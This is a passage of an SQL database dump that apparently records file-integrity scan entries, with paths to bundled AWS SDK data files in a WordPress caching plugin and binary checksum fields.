69`z$','',0,'?'),('3ߴ*/m/;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',|b+9ۅ','ʷc/»TΆ!\Z_ N: Dso','',0,'?'),(' &)z$8c','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/marketplacecommerceanalytics/2015-07-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ]WI','ú+(eq\Z{\0;\0s}{y','',0,'?'),('Sw\'<,82','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconnect/2018-11-14/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediaconnect/2018-11-14/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e8ѡKECe','TD5鈮#X@(=>~Y]','',0,'?'),('Rl l','',0,'?'),('7GnB','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediatailor/2018-04-23/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediatailor/2018-04-23/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W-O{tؔ','WPr&:Y>hogZhc}S?w','',0,'?'),('6L7 %?n**9','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediatailor/2018-04-23/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mediatailor/2018-04-23/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ޗb(܅','2PK\Z!ݕ[glqѥJ%','',0,'?'),('7K!h:\rTjt42K','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/metering.marketplace/2016-01-14/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/metering.marketplace/2016-01-14/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R+Bv>˴@','T#pbGEd!)J|','',0,'?'),('GhF','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/metering.marketplace/2016-01-14/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/metering.marketplace/2016-01-14/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\">wtrZ',' <.9NQ5T TYA{\ZE','',0,'?'),('6 Fv[| \0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgh/2017-05-31/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgh/2017-05-31/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qG&*?%','3 ? -WyI#/>ʻd\'t','',0,'?'),('4aI4 ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgh/2017-05-31/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgh/2017-05-31/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i$A+hR','ш\nPPdA_b#GVf','',0,'?'),('ރ`G3\Z/xo\r{','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgn/2020-02-26/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgn/2020-02-26/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?U_3zw','5udd[a{ϩ2N$oz','',0,'?'),('ܞyK2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgn/2020-02-26/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mgn/2020-02-26/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?Vjn','~Jv@ 7N$%]3','',0,'?'),('\Z_lo-n!K<','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/migrationhub-config/2019-06-30/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/migrationhub-config/2019-06-30/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_yL}ٱSD)','l\\۰M@?M]?lߺO?5','',0,'?'),('ӑ7Kt','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/migrationhub-config/2019-06-30/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/migrationhub-config/2019-06-30/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AҋjL9;\rL','.-C`?o77 \Z16','',0,'?'),('l}\":A~','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mobile/2017-07-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mobile/2017-07-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.ȿWN;','a\n\Z0pbKt>ZZS/','',0,'?'),('څgrJk|','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mobile/2017-07-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mobile/2017-07-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6\nŒ o#5\rXQ',':bVi~|a*i%֊LJx','',0,'?'),('cT0x_J?L ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/models.lex.v2/2020-08-07/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/models.lex.v2/2020-08-07/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nk.Vr~','qXkp[b,<ʌӬVX.','',0,'?'),('\"A/c+}','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/models.lex.v2/2020-08-07/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/models.lex.v2/2020-08-07/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hz 8fjs','5lI`rs&Pޱ\'\Z@4R','',0,'?'),('Z_M2 ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F|u*xi$dÚ~','ᆭYsA:5\'4GScKe5N7|%','',0,'?'),('jc)/P`e','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uww%+$','I{=°L[H9\"@ꄉ D','',0,'?'),('_ܻ8ZX|','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\\U/','VL9kM>PҗHd','',0,'?'),('4HSL','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/monitoring/2010-08-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_lk*','ϝV E&;pPm/MZ_','',0,'?'),('csm&7Q#<','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mq/2017-11-27/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mq/2017-11-27/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l6\"^cj2$=','OĖM~%DW~VNBь;yPI','',0,'?'),('TqO(ٹsB','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mq/2017-11-27/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mq/2017-11-27/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SoQLrz lA','ֿxhp%^պ o7 ','',0,'?'),('\0v. j7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P~k{),:[','Ef,4MV7Yݘ,eS','',0,'?'),('.Ug.\ZRuj#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ?Jv eϾNc','p\nlǿi, LOK=m(ђg','',0,'?'),('\Z2g;.@fg','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mturk-requester/2017-01-17/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':~.Xӳ2n^','wcxYg`D4`.\\6}y\n$ZF','',0,'?'),(' :fw˧9*O','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mwaa/2020-07-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mwaa/2020-07-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zCKy/ Oʥ','[f1eJ o6Hh-bPA;I)8\0KbL@','',0,'?'),('.)IL҅\Zb','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mwaa/2020-07-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/mwaa/2020-07-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eź,3#[*e}',' pF0ۆ=7N','',0,'?'),('|uzS$','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pk&uWwj','/ ;\\3[XK^aJڳBw$W','',0,'?'),('`IZD[uS','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sЕ|4\r\Z,','\ZjB3\\i )Re Ⰲfs','',0,'?'),('㷱9g,!k\r{','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zXxoqAAD.','^,:LYm$w','',0,'?'),('OX5sS\nt','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/neptune/2014-10-31/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2tmS~\ro','7w<H\\hy\"','',0,'?'),('Ԝ˻Xjz','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/network-firewall/2020-11-12/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/network-firewall/2020-11-12/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\G9M2HD@D','h*bC\'\\ KK ','',0,'?'),('\'dw\r.a[y','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/network-firewall/2020-11-12/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/network-firewall/2020-11-12/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c>#R\nǚ\0','좹j,o\\v?mi','',0,'?'),('wv:vo \\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/networkmanager/2019-07-05/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/networkmanager/2019-07-05/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qh:H T','9)SP*+\\x. Y>K','',0,'?'),('&m} x余 ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/networkmanager/2019-07-05/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/networkmanager/2019-07-05/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BwyTˍ f','^K{KYpKdVC','',0,'?'),('bڰZ\rE,','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/nimble/2020-08-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/nimble/2020-08-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*g8!( HH','Twz{7)8\rpZ%ݍ.','',0,'?'),('um긆wPb|w+','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/nimble/2020-08-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/nimble/2020-08-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PyXw+q','Wќbf\"n\'\0޿Ѣ `','',0,'?'),('{(_AGhB4W','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#sNx&Kf','d_c\n=k3AFL2~ ','',0,'?'),('KĜ%<+','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P)٢*O','ڑr$=Ts#.\'{ je','',0,'?'),('n\Z->zq `S','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bu\rdGD','@E^̪IWX&wWLկZ','',0,'?'),('Zy&U9@<_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xgud\0BL','M{ػ}1;8%b^ΟZ)n|/','',0,'?'),('E;]OX\\+h','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z-S*Fj랾','oת=]^IE!SaUf+','',0,'?'),('&V=,r{1','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X4K9؈-g','xieuUZp9n,Q_SOJ','',0,'?'),('B28ht','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/opsworkscm/2016-11-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OcaR֥1','pl1.\',\\?%\'!Y2/8','',0,'?'),('35n\'\' \rh7d*','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/organizations/2016-11-28/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/organizations/2016-11-28/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mn!d{/','H0[̝\0v0[(E÷f\'H','',0,'?'),('Qat+0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/organizations/2016-11-28/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/organizations/2016-11-28/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' SIHaŎC\\m','tE*!~౿R*oev','',0,'?'),('KG|BJ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/outposts/2019-12-03/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/outposts/2019-12-03/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3?4#~','&_A_KW:#x͙K%x','',0,'?'),(':O]U:Z)','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/outposts/2019-12-03/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/outposts/2019-12-03/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lg13/)h{','aTzʩ&uYD/\\3&9% ιX','',0,'?'),('p;!Y0eLfiOi','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize/2018-05-22/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize/2018-05-22/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','՟E>Wwq','}%r_1c~U%fmr:\'9','',0,'?'),('4\rd3s}','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize/2018-05-22/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize/2018-05-22/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7EMK','>9#q2EѬu(.Lb{SlK','',0,'?'),('3E(p\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-events/2018-03-22/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-events/2018-03-22/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>3Rg)w$\\.','`рb7rh^ QTu9k','',0,'?'),('\Z +eBv;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-events/2018-03-22/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-events/2018-03-22/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nрv\"H','md9ix;#ԑ6Lw2)Dd','',0,'?'),('2٢gG y','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-runtime/2018-05-22/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-runtime/2018-05-22/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SN .:b=','uC1^Ψ)5A!~]\ZNl~','',0,'?'),('*uJ8&\rz','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-runtime/2018-05-22/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/personalize-runtime/2018-05-22/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>9:Qbof\\r','^Po>f! \\%=^$K0<','',0,'?'),('Qq}Qm⚘\"q','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pi/2018-02-27/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pi/2018-02-27/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\'W6p\Z%5','\0G p\'xjC\'o5O+','',0,'?'),('\"p/o >_%','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pi/2018-02-27/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pi/2018-02-27/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kݟ<','O\"v إ\r =|Vވ0E','',0,'?'),('~Y-{ƙez','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint/2016-12-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint/2016-12-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rCImݍ?m','a8)y 8ѣ]\":$ y\'!q','',0,'?'),('C7 +~:M','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint-email/2018-07-26/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint-email/2018-07-26/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9β@ Ah','!AqsMoTk&VֆBIEt','',0,'?'),('ndnqsZ\"G ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint-email/2018-07-26/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pinpoint-email/2018-07-26/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6v5`{n','*}\r#r>7lR:3ZjӦ','',0,'?'),('s004l\'7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a.-)mIg\\','bw>uAp\Z/|֔|','',0,'?'),('jL AW','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#LjR$}U[','\rGdZI]CP~CCqטfF','',0,'?'),('+&k>x4M2{','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/polly/2016-06-10/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w#{\'\r','Q6X\";+\\Li\'ϚC?=e IM','',0,'?'),('c)njG`G8','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pricing/2017-10-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pricing/2017-10-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';CiFN85','RK_\nϰ/}q\r;b','',0,'?'),('2k\ZHV','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pricing/2017-10-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/pricing/2017-10-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\Z\nvl!n','oQr-YIN -4O s ;H','',0,'?'),('8Ӆ\\\rCq(','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb/2019-01-02/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb/2019-01-02/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n&{]k͟','nGZ}-M}e-\\a\'ER%U<','',0,'?'),('\nlb8t/~|Ej','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb/2019-01-02/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb/2019-01-02/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@^,K]}{}j','E,O2N/\'=?&xk\r3','',0,'?'),('HЌ[<_T','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb-session/2019-07-11/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb-session/2019-07-11/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rE̚I#8',']} y^Ӹ8号m','',0,'?'),('\';sk\Zb@ 